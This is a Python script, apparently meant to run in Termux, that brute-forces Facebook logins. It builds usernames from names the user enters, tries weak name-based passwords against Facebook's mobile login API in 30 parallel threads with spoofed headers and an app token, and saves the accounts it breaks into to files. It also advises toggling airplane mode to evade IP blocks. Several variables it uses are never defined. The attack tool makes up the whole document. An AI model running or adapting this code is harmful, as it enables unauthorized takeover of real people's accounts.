#link = ses.get("https://m.facebook.com/login.php?skip_api_login=1&api_key=2582347323&kid_directed_site=0&app_id=2582347323&signed_next=1&next=https%3A%2F%2Fm.facebook.com%2Fv16.0%2Fdialog%2Foauth%3Fcct_prefetching%3D0%26client_id%3D2582347323%26cbt%3D1699363885204%26e2e%3D%257B%2522init%2522%253A1699363885205%257D%26ies%3D1%26sdk%3Dandroid-16.0.0%26sso%3Dchrome_custom_tab%26nonce%3D8919a32a-313f-4909-931c-35873bb3307b%26scope%3Duser_birthday%252Copenid%252Cemail%26state%3D%257B%25220_auth_logger_id%2522%253A%25221a1f4d32-fec4-4a0c-b591-afdd98c187bb%2522%252C%25223_method%2522%253A%2522custom_tab%2522%252C%25227_challenge%2522%253A%2522kmh0v851cpm8rlg838qg%2522%257D%26code_challenge_method%3DS256%26default_audience%3Dfriends%26login_behavior%3DNATIVE_WITH_FALLBACK%26redirect_uri%3Dfbconnect%253A%252F%252Fcct.wp.wattpad%26auth_type%3Drerequest%26response_type%3Did_token%252Ctoken%252Csigned_request%252Cgraph_domain%26return_scopes%3Dtrue%26code_challenge%3DOjxCQjdeWLOEz_c-3If13X3enpPc6pYonrAw4egv2YQ%26ret%3Dlogin%26fbapp_pres%3D0%26logger_id%3D1a1f4d32-fec4-4a0c-b591-afdd98c187bb%26tp%3Dunspecified&cancel_url=fbconnect%3A%2F%2Fcct.wp.wattpad%3Ferror%3Daccess_denied%26error_code%3D200%26error_description%3DPermissions%2Berror%26error_reason%3Duser_denied%26state%3D%257B%25220_auth_logger_id%2522%253A%25221a1f4d32-fec4-4a0c-b591-afdd98c187bb%2522%252C%25223_method%2522%253A%2522custom_tab%2522%252C%25227_challenge%2522%253A%2522kmh0v851cpm8rlg838qg%2522%257D&display=touch&locale=ms_MY&pl_dbl=0&refsrc=deprecated&_rdr").text
###--------------------[BASIC MODULES]----------------###
import os,random,uuid,httpx,json,sys,string,time
from concurrent.futures import ThreadPoolExecutor as ALIFNURDIN

###--------------------[BASIC COLORS]----------------###
C = "\033[0;96m"
P = "\033[0;97m"
###--------------------[CHANING COLORS]----------------###
colors = ["\033[0;30m", "\033[1;30m", "\033[0;31m", "\033[1;31m", "\033[0;32m", "\033[1;32m","\033[0;92m","\033[1;92m","\033[1;93m","\033[1;94m","\033[1;95m","\033[1;96m","\033[0;33m", "\033[1;33m", "\033[0;34m", "\033[1;34m", "\033[0;35m", "\033[1;35m", "\033[0;36m", "\033[1;36m", "\033[0;37m", "\033[1;37m", "\033[1;90m", "\033[0;91m","\033[1;91m", "\033[0;92m", "\033[1;93m", "\033[0;94m", "\033[1;94m", "\033[0;95m","\033[1;95m", "\033[0;96m", "\033[1;96m", "\033[0;97m", "\033[0;100m", "\033[1;100m","\033[0;101m", "\033[1;101m", "\033[0;102m", "\033[1;102m","\033[0;104m", "\033[1;104m", "\033[0;105m", "\033[1;105m", "\033[0;106m", "\033[1;106m"]

###--------------------[TERMUX SESSION NAME]----------------###
sys.stdout.write('\x1b]2; XYZ - FB USER 🆔 \x07')


###--------------------[LOOP]----------------###
successfull=[]
checkpoint=[]
loop=0

os.system("clear");print("\n\t join our facebook👉🆔");time.sleep(2)
os.system('xdg-open https://www.facebook.com/AlifXyz78')
  
###--------------------[MAIN LOGO]----------------###
logo=f"""
\033[1;31m░░    ░░ ░░░░░░░ ░░░░░░░ ░░░░░░  
\033[1;32m▒▒    ▒▒ ▒▒      ▒▒      ▒▒   ▒▒ 
\033[1;33m▒▒    ▒▒ ▒▒▒▒▒▒▒ ▒▒▒▒▒   ▒▒▒▒▒▒  
\033[1;34m▓▓    ▓▓      ▓▓ ▓▓      ▓▓   ▓▓ 
\033[1;35m ██████  ███████ ███████ ██   ██ 
\033[1;36m        [ Code By Alif Nurdin Afizayen ] 
{50 * '-'}
Author   : Alif Nurdin Afijayen
Github   : https://github.com/Alif-Nurdin
Facebook : https://www.facebook.com/AlifXyz78
{50 * '-'}"""

###--------------------[MAIN MENU]----------------###

def fb_user():
    os.system('clear');print(logo)
    user=[]
    print(f"{C}For Example : siti, yanti, santi, nurul, umar, ahmad, hasan")
    first = input(f'{P}Nama Depan : ')
    print(f"{C}For Example : maharani, ali, komar, sodikin")
    last = input(f'{P}Nama Belakang :  ')
    period = '.'
    try:
        print(f"{C}For Example : 1000, 2000, 5000, 10000 ")
        limit=int(input(f'{P}Mau Berapa Limit Broot ? : '))
    except ValueError:
        limit=5000
    for nmbr in range(limit):
        nmp="".join(random.choice(string.digits) for _ in range(1,4))
        user.append(nmp)
    with ALIFNURDIN(max_workers=30) as XYZ:
        total=str(len(user))
        os.system("clear");print(logo)
        print(f"{P}Use airplane mode to unblock ip")
        print(f"Ids will be saved in /sdcard/XYZ")
        print(50 * '-')
        print('Total ids: '+total)
        print(f"User: {first} {last}")
        print(f"CP ids open after 10 days") 
        print(50 * '-')
        for digitx in user:
            user=first+period+last+digitx
            pswrd = [first,last,first+last,first+'123',first+'1234',first+'12345',last+'123',last+'1234',last+'12345']
            XYZ.submit(processcrack,user,pswrd,total)
    print(50 * '\033[0;97m-')
    print('Program finished! ')
    print(f"Total OK; {len(oks)}") 
    print(f"Total OK; {len(cps)}")
    print(50 * '-')
    input(" [ PRESS ENTER TO BACK ] ") 
    fb_user()
    

###--------------------[DEF CRACK USER]----------------###   

def processcrack(user,pswrd,total):
    global successfull
    global checkpoint
    global loop
    try:
        for password in pswrd:
            adid=str(uuid.uuid4())
            device_id=str(uuid.uuid4())
            connection={'adid': adid,
           'format': 'json',
           'device_id': device_id,
           'email': user,
           'password': password, 
           'generate_analytics_claims': '1',
           'credentials_type': 'password',
           'source': 'login', 
           'error_detail_type': 'button_with_disabled',
           'enroll_misauth': 'false', 
           'generate_session_cookies': '1',
           'generate_machine_id': '1',
           'meta_inf_fbmeta': '', 
           'currently_logged_in_userid': '0',
            'fb_api_req_friendly_name': 'authenticate'}
            header={'User-Agent': '[FBAN/FB4A;FBAV/39.0.0.2424;FBBV/4475870;[FBAN/FB4A;FBAV/226.0.0.49.120;FBBV/159526646;FBDM/{density=1.5,width=720,height=1244};FBLC/en_GB;FBRV/0;FBCR/Telenor PK;FBMF/samsung;FBBD/samsung;FBPN/com.facebook.katana;FBDV/SM-J100H;FBSV/4.4.4;FBOP/1;FBCA/armeabi-v7a:armeabi;]', 'Accept-Encoding': 'gzip, deflate',
            'Accept': '*/*',
            'Connection': 'keep-alive', 
            'Authorization': 'OAuth 350685531728|62f8ce9f74b12f84c123cc23437a4a32', 
            'X-FB-Friendly-Name': 'authenticate', 
            'X-FB-Connection-Bandwidth': '21435', 
            'X-FB-Net-HNI': '35793',
            'X-FB-SIM-HNI': '37855', 
            'X-FB-Connection-Type': 'unknown', 
            'Content-Type': 'application/x-www-form-urlencoded', 
            'X-FB-HTTP-Engine': 'Liger'}
            login_url='https://api.facebook.com/method/auth.login'
            req=httpx.post(login_url,data=connection,headers=header).json()
            if 'session_key' in req:
                print(f'\r\033[1;92m[OK] '+user+' | '+password)
                print(f'{P}{cookie}')
                open('/sdcard/XYZ/USER_OK.txt', 'a').write(username+' | '+password+'\n')
                successfull.append(user)
                break
            elif 'www.facebook.com' in req['error_msg']:
                print(f'\r\033[1;93m[CP] '+user+' | '+password)
                open('/sdcard/XYZ/USER_CP.txt', 'a').write(user+' | '+password+'\n')
                checkpoint.append(user)
                break
            else:
                continue
        loop+=1
        x = random.choice(colors)
        sys.stdout.write(f"\r\033[0;97m[{x}{user}\033[0;97m] {total}/{loop}; OK;{len(successfull)} CP;{len(checkpoint)} {'{:.0%}'.format(loop/float(total))} ")
        sys.stdout.flush()
    except:
        pass
        

if __name__=="__main__":
  try:os.mkdir('/sdcard/XYZ')
  except:pass
  fb_user()
  
